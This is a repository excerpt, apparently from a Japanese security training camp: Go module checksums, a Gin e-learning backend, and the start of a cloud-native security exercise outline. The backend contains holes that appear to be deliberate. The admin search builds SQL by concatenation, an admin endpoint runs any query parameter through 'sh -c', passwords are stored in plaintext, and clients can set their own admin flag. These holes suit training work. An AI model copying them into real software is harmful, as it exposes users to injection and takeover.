h1:3gQ8GMzs1Ylpf70y8bMw4fVpycXIeX1ZemuSQIsnQQY= 25 | github.com/gin-contrib/cors v1.7.6/go.mod h1:Ulcl+xN4jel9t1Ry8vqph23a60FwH9xVLd+3ykmTjOk= 26 | github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE= 27 | github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI= 28 | github.com/gin-contrib/sse v1.1.0 h1:n0w2GMuUpWDVp7qSpvze6fAu9iRxJY4Hmj6AmBOU05w= 29 | github.com/gin-contrib/sse v1.1.0/go.mod h1:hxRZ5gVpWMT7Z0B0gSNYqqsSCNIJMjzvm6fqCz9vjwM= 30 | github.com/gin-gonic/gin v1.9.1 h1:4idEAncQnU5cB7BeOkPtxjfCSye0AAm1R0RVIqJ+Jmg= 31 | github.com/gin-gonic/gin v1.9.1/go.mod h1:hPrL7YrpYKXt5YId3A/Tnip5kqbEAP+KLuI3SUcPTeU= 32 | github.com/gin-gonic/gin v1.10.1 h1:T0ujvqyCSqRopADpgPgiTT63DUQVSfojyME59Ei63pQ= 33 | github.com/gin-gonic/gin v1.10.1/go.mod h1:4PMNQiOhvDRa013RKVbsiNwoyezlm2rm0uX/T7kzp5Y= 34 | github.com/go-playground/assert/v2 v2.2.0 h1:JvknZsQTYeFEAhQwI4qEt9cyV5ONwRHC+lYKSsYSR8s= 35 | github.com/go-playground/assert/v2 v2.2.0/go.mod h1:VDjEfimB/XKnb+ZQfWdccd7VUvScMdVu0Titje2rxJ4= 36 | github.com/go-playground/locales v0.14.1 h1:EWaQ/wswjilfKLTECiXz7Rh+3BjFhfDFKv/oXslEjJA= 37 | github.com/go-playground/locales v0.14.1/go.mod h1:hxrqLVvrK65+Rwrd5Fc6F2O76J/NuW9t0sjnWqG1slY= 38 | github.com/go-playground/universal-translator v0.18.1 h1:Bcnm0ZwsGyWbCzImXv+pAJnYK9S473LQFuzCbDbfSFY= 39 | github.com/go-playground/universal-translator v0.18.1/go.mod h1:xekY+UJKNuX9WP91TpwSH2VMlDf28Uj24BCp08ZFTUY= 40 | github.com/go-playground/validator/v10 v10.14.0 h1:vgvQWe3XCz3gIeFDm/HnTIbj6UGmg/+t63MyGU2n5js= 41 | github.com/go-playground/validator/v10 v10.14.0/go.mod h1:9iXMNT7sEkjXb0I+enO7QXmzG6QCsPWY4zveKFVRSyU= 42 | github.com/go-playground/validator/v10 v10.26.0 h1:SP05Nqhjcvz81uJaRfEV0YBSSSGMc/iMaVtFbr3Sw2k= 43 | github.com/go-playground/validator/v10 v10.26.0/go.mod h1:I5QpIEbmr8On7W0TktmJAumgzX4CA1XNl4ZmDuVHKKo= 44 | github.com/go-sql-driver/mysql v1.9.3 h1:U/N249h2WzJ3Ukj8SowVFjdtZKfu9vlLZxjPXV1aweo= 45 | github.com/go-sql-driver/mysql v1.9.3/go.mod h1:qn46aNg1333BRMNU69Lq93t8du/dwxI64Gl8i5p1WMU= 46 | github.com/goccy/go-json v0.10.2 h1:CrxCmQqYDkv1z7lO7Wbh2HN93uovUHgrECaO5ZrCXAU= 47 | github.com/goccy/go-json v0.10.2/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I= 48 | github.com/goccy/go-json v0.10.5 h1:Fq85nIqj+gXn/S5ahsiTlK3TmC85qgirsdTP/+DeaC4= 49 | github.com/goccy/go-json v0.10.5/go.mod h1:oq7eo15ShAhp70Anwd5lgX2pLfOS3QCiwU/PULtXL6M= 50 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 51 | github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU= 52 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 53 | github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= 54 | github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= 55 | github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM= 56 | github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo= 57 | github.com/klauspost/cpuid/v2 v2.0.9/go.mod h1:FInQzS24/EEf25PyTYn52gqo7WaD8xa0213Md/qVLRg= 58 | github.com/klauspost/cpuid/v2 v2.2.4 h1:acbojRNwl3o09bUq+yDCtZFc1aiwaAAxtcn8YkZXnvk= 59 | github.com/klauspost/cpuid/v2 v2.2.4/go.mod h1:RVVoqg1df56z8g3pUjL/3lE5UfnlrJX8tyFgg4nqhuY= 60 | github.com/klauspost/cpuid/v2 v2.2.10 h1:tBs3QSyvjDyFTq3uoc/9xFpCuOsJQFNPiAhYdw2skhE= 61 | github.com/klauspost/cpuid/v2 v2.2.10/go.mod h1:hqwkgyIinND0mEev00jJYCxPNVRVXFQeu1XKlok6oO0= 62 | github.com/knz/go-libedit v1.10.1/go.mod h1:MZTVkCWyz0oBc7JOWP3wNAzd002ZbM/5hgShxwh4x8M= 63 | github.com/leodido/go-urn v1.2.4 h1:XlAE/cm/ms7TE/VMVoduSpNBoyc2dOxHs5MZSwAN63Q= 64 | github.com/leodido/go-urn v1.2.4/go.mod h1:7ZrI8mTSeBSHl/UaRyKQW1qZeMgak41ANeCNaVckg+4= 65 | github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ= 66 | github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI= 67 | github.com/mattn/go-isatty v0.0.19 h1:JITubQf0MOLdlGRuRq+jtsDlekdYPia9ZFsB8h/APPA= 68 | github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= 69 | github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= 70 | github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= 71 | github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= 72 | github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg= 73 | github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= 74 | github.com/modern-go/reflect2 v1.0.2 h1:xBagoLtFs94CBntxluKeaWgTMpvLxC4ur3nMaC9Gz0M= 75 | github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk= 76 | github.com/pelletier/go-toml/v2 v2.0.8 h1:0ctb6s9mE31h0/lhu+J6OPmVeDxJn+kYnJc2jZR9tGQ= 77 | github.com/pelletier/go-toml/v2 v2.0.8/go.mod h1:vuYfssBdrU2XDZ9bYydBu6t+6a6PYNcZljzZR9VXg+4= 78 | github.com/pelletier/go-toml/v2 v2.2.4 h1:mye9XuhQ6gvn5h28+VilKrrPoQVanw5PMw/TB0t5Ec4= 79 | github.com/pelletier/go-toml/v2 v2.2.4/go.mod h1:2gIqNv+qfxSVS7cM2xJQKtLSTLUE9V8t9Stt+h56mCY= 80 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 81 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 82 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 83 | github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= 84 | github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= 85 | github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= 86 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 87 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 88 | github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= 89 | github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= 90 | github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= 91 | github.com/stretchr/testify v1.8.3 h1:RP3t2pwF7cMEbC1dqtB6poj3niw/9gnV4Cjg5oW5gtY= 92 | github.com/stretchr/testify v1.8.3/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= 93 | github.com/stretchr/testify v1.10.0 h1:Xv5erBjTwe/5IxqUQTdXv5kgmIvbHo3QQyRwhJsOfJA= 94 | github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS4MhqMhdFk5YI= 95 | github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08= 96 | github.com/ugorji/go/codec v1.2.11 h1:BMaWp1Bb6fHwEtbplGBGJ498wD+LKlNSl25MjdZY4dU= 97 | github.com/ugorji/go/codec v1.2.11/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg= 98 | github.com/ugorji/go/codec v1.3.0 h1:Qd2W2sQawAfG8XSvzwhBeoGq71zXOC/Q1E9y/wUcsUA= 99 | github.com/ugorji/go/codec v1.3.0/go.mod h1:pRBVtBSKl77K30Bv8R2P+cLSGaTtex6fsA2Wjqmfxj4= 100 | golang.org/x/arch v0.0.0-20210923205945-b76863e36670/go.mod h1:5om86z9Hs0C8fWVUuoMHwpExlXzs5Tkyp9hOrfG7pp8= 101 | golang.org/x/arch v0.3.0 h1:02VY4/ZcO/gBOH6PUaoiptASxtXU10jazRCP865E97k= 102 | golang.org/x/arch v0.3.0/go.mod h1:5om86z9Hs0C8fWVUuoMHwpExlXzs5Tkyp9hOrfG7pp8= 103 | golang.org/x/arch v0.18.0 h1:WN9poc33zL4AzGxqf8VtpKUnGvMi8O9lhNyBMF/85qc= 104 | golang.org/x/arch v0.18.0/go.mod h1:bdwinDaKcfZUGpH09BB7ZmOfhalA8lQdzl62l8gGWsk= 105 | golang.org/x/crypto v0.9.0 h1:LF6fAI+IutBocDJ2OT0Q1g8plpYljMZ4+lty+dsqw3g= 106 | golang.org/x/crypto v0.9.0/go.mod h1:yrmDGqONDYtNj3tH8X9dzUun2m2lzPa9ngI6/RUPGR0= 107 | golang.org/x/crypto v0.39.0 h1:SHs+kF4LP+f+p14esP5jAoDpHU8Gu/v9lFRK6IT5imM= 108 | golang.org/x/crypto v0.39.0/go.mod h1:L+Xg3Wf6HoL4Bn4238Z6ft6KfEpN0tJGo53AAPC632U= 109 | golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= 110 | golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= 111 | golang.org/x/net v0.41.0 h1:vBTly1HeNPEn3wtREYfy4GZ/NECgw2Cnl+nK6Nz3uvw= 112 | golang.org/x/net v0.41.0/go.mod h1:B/K4NNqkfmg07DQYrbwvSluqCJOOXwUjeb/5lOisjbA= 113 | golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 114 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 115 | golang.org/x/sys v0.8.0 h1:EBmGv8NaZBZTWvrbjNoL6HVt+IVy3QDQpJs7VRIw3tU= 116 | golang.org/x/sys v0.8.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 117 | golang.org/x/sys v0.33.0 h1:q3i8TbbEz+JRD9ywIRlyRAQbM0qF7hu24q3teo2hbuw= 118 | golang.org/x/sys v0.33.0/go.mod h1:BJP2sWEmIv4KK5OTEluFJCKSidICx8ciO85XgH3Ak8k= 119 | golang.org/x/text v0.9.0 h1:2sjJmO8cDvYveuX97RDLsxlyUxLl+GHoLxBiRdHllBE= 120 | golang.org/x/text v0.9.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= 121 | golang.org/x/text v0.26.0 h1:P42AVeLghgTYr4+xUnTRKDMqpar+PtX7KWuNQL21L8M= 122 | golang.org/x/text v0.26.0/go.mod h1:QK15LZJUUQVJxhz7wXgxSy/CJaTFjd0G+YLonydOVQA= 123 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4= 124 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 125 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 126 | google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng= 127 | google.golang.org/protobuf v1.30.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 128 | google.golang.org/protobuf v1.36.6 h1:z1NpPI8ku2WgiWnf+t9wTPsn6eP1L7ksHUlkfLvd9xY= 129 | google.golang.org/protobuf v1.36.6/go.mod h1:jduwjTPXsFjZGTmRluh+L6NjiWu7pchiJ2/5YcXBHnY= 130 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= 131 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 132 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= 133 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 134 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 135 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 136 | nullprogram.com/x/optparse v1.0.0/go.mod h1:KdyPE+Igbe0jQUrVfMqDMeJQIJZEuyV7pjYmp6pbG50= 137 | rsc.io/pdf v0.1.1/go.mod h1:n8OzWcQ6Sp37PL01nO98y4iUCRdTGarVfzxY20ICaU4= 138 | -------------------------------------------------------------------------------- /app/backend/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | "net/http" 7 | "os" 8 | "os/exec" 9 | 10 | "github.com/gin-contrib/cors" 11 | "github.com/gin-gonic/gin" 12 | _ "github.com/go-sql-driver/mysql" 13 | ) 14 | 15 | type User struct { 16 | Username string `json:"username"` 17 | FullName string `json:"full_name"` 18 | Password string `json:"password"` 19 | IsAdmin bool `json:"is_admin"` 20 | Progress map[int]int `json:"progress"` 21 | } 22 | 23 | type Course struct { 24 | ID int `json:"id"` 25 | Title string `json:"title"` 26 | Description string `json:"description"` 27 | } 28 | 29 | var db *sql.DB 30 | 31 | var users = []User{ 32 | {Username: "student1", FullName: "Student One", Password: "pass1", Progress: map[int]int{1: 50, 2: 0}}, 33 | {Username: "admin", FullName: "Admin User", Password: "adminpass", IsAdmin: true, Progress: map[int]int{}}, 34 | } 35 | var courses = []Course{ 36 | {ID: 1, Title: "Python入門", Description: "Pythonの基礎を学ぶコース"}, 37 | {ID: 2, Title: "Kubernetes基礎", Description: "Kubernetesの基本を学ぶコース"}, 38 | } 39 | 40 | func initDB() error { 41 | // 環境変数からDB接続情報を取得 42 | host := os.Getenv("DB_HOST") 43 | if host == "" { 44 | host = "db" 45 | } 46 | port := os.Getenv("DB_PORT") 47 | if port == "" { 48 | port = "3306" 49 | } 50 | user := os.Getenv("DB_USER") 51 | if user == "" { 52 | user = "root" 53 | } 54 | pass := os.Getenv("DB_PASSWORD") 55 | if pass == "" { 56 | pass = "password" 57 | } 58 | name := os.Getenv("DB_NAME") 59 | if name == "" { 60 | name = "seccamp2025" 61 | } 62 | dsn := fmt.Sprintf("%s:%s@tcp(%s:%s)/%s?parseTime=true&multiStatements=true", user, pass, host, port, name) 63 | var err error 64 | db, err = sql.Open("mysql", dsn) 65 | if err != nil { 66 | return err 67 | } 68 | return db.Ping() 69 | } 70 | 71 | func main() { 72 | if err := initDB(); err != nil { 73 | panic(fmt.Sprintf("DB接続失敗: %v", err)) 74 | } 75 | 76 | r := gin.Default() 77 | r.Use(cors.Default()) 78 | 79 | // コース一覧(DB連携) 80 | r.GET("/courses", func(c *gin.Context) { 81 | rows, err := db.Query("SELECT id, title, description FROM courses") 82 | if err != nil { 83 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 84 | return 85 | } 86 | defer rows.Close() 87 | var courses []Course 88 | for rows.Next() { 89 | var course Course 90 | if err := rows.Scan(&course.ID, &course.Title, &course.Description); err != nil { 91 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 92 | return 93 | } 94 | courses = append(courses, course) 95 | } 96 | c.JSON(http.StatusOK, courses) 97 | }) 98 | 99 | // コース詳細 100 | r.GET("/courses/:id", func(c *gin.Context) { 101 | id := c.Param("id") 102 | for _, course := range courses { 103 | if id == string(rune(course.ID)) { 104 | c.JSON(http.StatusOK, course) 105 | return 106 | } 107 | } 108 | c.JSON(http.StatusNotFound, gin.H{"error": "Course not found"}) 109 | }) 110 | 111 | // ユーザー登録(DB連携) 112 | r.POST("/register", func(c *gin.Context) { 113 | var user User 114 | if err := c.ShouldBindJSON(&user); err != nil { 115 | c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request"}) 116 | return 117 | } 118 | // ユーザー名重複チェック 119 | var exists int 120 | err := db.QueryRow("SELECT COUNT(*) FROM users WHERE username = ?", user.Username).Scan(&exists) 121 | if err != nil { 122 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 123 | return 124 | } 125 | if exists > 0 { 126 | c.JSON(http.StatusBadRequest, gin.H{"error": "User already exists"}) 127 | return 128 | } 129 | // ユーザー登録 130 | _, err = db.Exec("INSERT INTO users (username, full_name, password, is_admin) VALUES (?, ?, ?, ?)", user.Username, user.FullName, user.Password, user.IsAdmin) 131 | if err != nil { 132 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 133 | return 134 | } 135 | c.JSON(http.StatusOK, gin.H{"msg": "User registered"}) 136 | }) 137 | 138 | // ログイン(DB連携) 139 | r.POST("/login", func(c *gin.Context) { 140 | var req User 141 | if err := c.ShouldBindJSON(&req); err != nil { 142 | c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request"}) 143 | return 144 | } 145 | var user User 146 | err := db.QueryRow("SELECT username, full_name, password, is_admin FROM users WHERE username = ?", req.Username).Scan(&user.Username, &user.FullName, &user.Password, &user.IsAdmin) 147 | if err == sql.ErrNoRows { 148 | c.JSON(http.StatusUnauthorized, gin.H{"error": "Invalid credentials"}) 149 | return 150 | } else if err != nil { 151 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 152 | return 153 | } 154 | if user.Password == req.Password { 155 | c.JSON(http.StatusOK, gin.H{"access_token": user.Username, "is_admin": user.IsAdmin}) 156 | return 157 | } 158 | c.JSON(http.StatusUnauthorized, gin.H{"error": "Invalid credentials"}) 159 | }) 160 | 161 | // 学習進捗取得(DB連携) 162 | r.GET("/progress/:username", func(c *gin.Context) { 163 | username := c.Param("username") 164 | var userID int 165 | err := db.QueryRow("SELECT id FROM users WHERE username = ?", username).Scan(&userID) 166 | if err == sql.ErrNoRows { 167 | c.JSON(http.StatusNotFound, gin.H{"error": "User not found"}) 168 | return 169 | } else if err != nil { 170 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 171 | return 172 | } 173 | rows, err := db.Query(`SELECT p.course_id, c.title, p.percent, p.updated_at FROM progress p JOIN courses c ON p.course_id = c.id WHERE p.user_id = ?`, userID) 174 | if err != nil { 175 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 176 | return 177 | } 178 | defer rows.Close() 179 | var result []map[string]interface{} 180 | for rows.Next() { 181 | var courseID, percent int 182 | var title string 183 | var updatedAt sql.NullTime 184 | if err := rows.Scan(&courseID, &title, &percent, &updatedAt); err != nil { 185 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 186 | return 187 | } 188 | item := map[string]interface{}{ 189 | "user_id": userID, 190 | "course_id": courseID, 191 | "course": title, 192 | "percent": percent, 193 | } 194 | if updatedAt.Valid { 195 | item["updated_at"] = updatedAt.Time.Format("2006-01-02T15:04:05") 196 | } 197 | result = append(result, item) 198 | } 199 | c.JSON(http.StatusOK, result) 200 | }) 201 | 202 | // 学習進捗更新(DB連携) 203 | r.POST("/progress/:username/:course_id", func(c *gin.Context) { 204 | username := c.Param("username") 205 | courseID := c.Param("course_id") 206 | var req struct { 207 | Percent int `json:"percent"` 208 | } 209 | if err := c.ShouldBindJSON(&req); err != nil { 210 | c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request"}) 211 | return 212 | } 213 | var userID int 214 | err := db.QueryRow("SELECT id FROM users WHERE username = ?", username).Scan(&userID) 215 | if err == sql.ErrNoRows { 216 | c.JSON(http.StatusNotFound, gin.H{"error": "User not found"}) 217 | return 218 | } else if err != nil { 219 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 220 | return 221 | } 222 | // 進捗更新(INSERT ... ON DUPLICATE KEY UPDATE) 223 | _, err = db.Exec(`INSERT INTO progress (user_id, course_id, percent, updated_at) VALUES (?, ?, ?, NOW()) ON DUPLICATE KEY UPDATE percent = VALUES(percent), updated_at = NOW()`, 224 | userID, courseID, req.Percent) 225 | if err != nil { 226 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 227 | return 228 | } 229 | c.JSON(http.StatusOK, gin.H{"msg": "Progress updated"}) 230 | }) 231 | 232 | // 管理者による教材登録(DB連携) 233 | r.POST("/courses", func(c *gin.Context) { 234 | var course Course 235 | if err := c.ShouldBindJSON(&course); err != nil { 236 | c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request"}) 237 | return 238 | } 239 | _, err := db.Exec("INSERT INTO courses (title, description) VALUES (?, ?)", course.Title, course.Description) 240 | if err != nil { 241 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 242 | return 243 | } 244 | c.JSON(http.StatusOK, gin.H{"msg": "Course added", "course": course}) 245 | }) 246 | 247 | // 管理画面用API(ユーザー検索:DB連携) 248 | r.GET("/admin/users", func(c *gin.Context) { 249 | search := c.Query("search") 250 | var query string 251 | 252 | if search != "" { 253 | query = "SELECT username, full_name, is_admin FROM users WHERE username LIKE '%" + search + "%'" 254 | } else { 255 | query = "SELECT username, full_name, is_admin FROM users" 256 | } 257 | 258 | rows, err := db.Query(query) 259 | if err != nil { 260 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error", "details": err.Error()}) 261 | return 262 | } 263 | defer rows.Close() 264 | 265 | columns, err := rows.Columns() 266 | if err != nil { 267 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 268 | return 269 | } 270 | 271 | var result []map[string]interface{} 272 | for rows.Next() { 273 | values := make([]interface{}, len(columns)) 274 | valuePtrs := make([]interface{}, len(columns)) 275 | for i := range values { 276 | valuePtrs[i] = &values[i] 277 | } 278 | 279 | if err := rows.Scan(valuePtrs...); err != nil { 280 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 281 | return 282 | } 283 | 284 | row := make(map[string]interface{}) 285 | for i, col := range columns { 286 | val := values[i] 287 | if b, ok := val.([]byte); ok { 288 | row[col] = string(b) 289 | } else { 290 | row[col] = val 291 | } 292 | } 293 | result = append(result, row) 294 | } 295 | c.JSON(http.StatusOK, result) 296 | }) 297 | 298 | // サーバー情報表示機能 299 | r.GET("/admin/info", func(c *gin.Context) { 300 | info := c.DefaultQuery("info", "uname") 301 | 302 | cmd := exec.Command("sh", "-c", info) 303 | output, err := cmd.Output() 304 | if err != nil { 305 | c.JSON(http.StatusOK, gin.H{ 306 | "command": info, 307 | "status": "executed", 308 | "output": string(output), 309 | "error": err.Error(), 310 | }) 311 | return 312 | } 313 | 314 | c.JSON(http.StatusOK, gin.H{ 315 | "command": info, 316 | "status": "success", 317 | "output": string(output), 318 | }) 319 | }) 320 | 321 | // コース参加申請(DB連携) 322 | r.POST("/courses/:id/join", func(c *gin.Context) { 323 | var req struct { 324 | Username string `json:"username"` 325 | } 326 | if err := c.ShouldBindJSON(&req); err != nil { 327 | c.JSON(http.StatusBadRequest, gin.H{"error": "Invalid request"}) 328 | return 329 | } 330 | courseID := c.Param("id") 331 | var userID int 332 | err := db.QueryRow("SELECT id FROM users WHERE username = ?", req.Username).Scan(&userID) 333 | if err == sql.ErrNoRows { 334 | c.JSON(http.StatusNotFound, gin.H{"error": "User not found"}) 335 | return 336 | } else if err != nil { 337 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 338 | return 339 | } 340 | // 進捗テーブルに初期値で登録(参加申請) 341 | _, err = db.Exec(`INSERT INTO progress (user_id, course_id, percent, updated_at) VALUES (?, ?, 0, NOW()) ON DUPLICATE KEY UPDATE percent = percent`, userID, courseID) 342 | if err != nil { 343 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 344 | return 345 | } 346 | c.JSON(http.StatusOK, gin.H{"msg": "Course joined"}) 347 | }) 348 | 349 | // 進捗一覧(全ユーザー・全コース分) 350 | r.GET("/progress", func(c *gin.Context) { 351 | rows, err := db.Query(`SELECT p.user_id, u.username, p.course_id, c.title, p.percent, p.updated_at FROM progress p JOIN users u ON p.user_id = u.id JOIN courses c ON p.course_id = c.id`) 352 | if err != nil { 353 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 354 | return 355 | } 356 | defer rows.Close() 357 | var result []map[string]interface{} 358 | for rows.Next() { 359 | var userID, courseID, percent int 360 | var username, title string 361 | var updatedAt sql.NullTime 362 | if err := rows.Scan(&userID, &username, &courseID, &title, &percent, &updatedAt); err != nil { 363 | c.JSON(http.StatusInternalServerError, gin.H{"error": "DB error"}) 364 | return 365 | } 366 | item := map[string]interface{}{ 367 | "user_id": userID, 368 | "username": username, 369 | "course_id": courseID, 370 | "course": title, 371 | "percent": percent, 372 | } 373 | if updatedAt.Valid { 374 | item["updated_at"] = updatedAt.Time.Format("2006-01-02T15:04:05") 375 | } 376 | result = append(result, item) 377 | } 378 | c.JSON(http.StatusOK, result) 379 | }) 380 | 381 | r.Run(":8000") 382 | } 383 | -------------------------------------------------------------------------------- /02_cloud_native_sec/training.md: -------------------------------------------------------------------------------- 1 | # 演習2 クラウドネイティブセキュリティの基礎 2 | 3 | - [演習2 クラウドネイティブセキュリティの基礎](#演習2-クラウドネイティブセキュリティの基礎) 4 | - [目標](#目標) 5 | - [0 事前準備](#0-事前準備) 6 | - [1. コンテナセキュリティ](#1-コンテナセキュリティ) 7 | - [1.1 コンテナの要素技術を理解する](#11-コンテナの要素技術を理解する) 8 | - [1.1.1 Namespaceの確認](#111-namespaceの確認) 9 | - [1.1.2 Cgroupの確認](#112-cgroupの確認) 10 | - [1.1.3 Capabilitiesの確認](#113-capabilitiesの確認) 11 | - [1.2 Dockerfileセキュリティスキャン](#12-dockerfileセキュリティスキャン) 12 | - [1.2.1 セキュアでないDockerfileの作成](#121-セキュアでないdockerfileの作成) 13 | - [1.2.2 Trivyを使用したDockerfileスキャン](#122-trivyを使用したdockerfileスキャン) 14 | - [1.2.3 セキュアなDockerfileの作成](#123-セキュアなdockerfileの作成) 15 | - [2. Kubernetesセキュリティ](#2-kubernetesセキュリティ) 16 | - [2.1 Kubernetesクラスタのセキュリティスキャン](#21-kubernetesクラスタのセキュリティスキャン) 17 | - [2.1.1 Trivyを使用したクラスタスキャン](#211-trivyを使用したクラスタスキャン) 18 | - 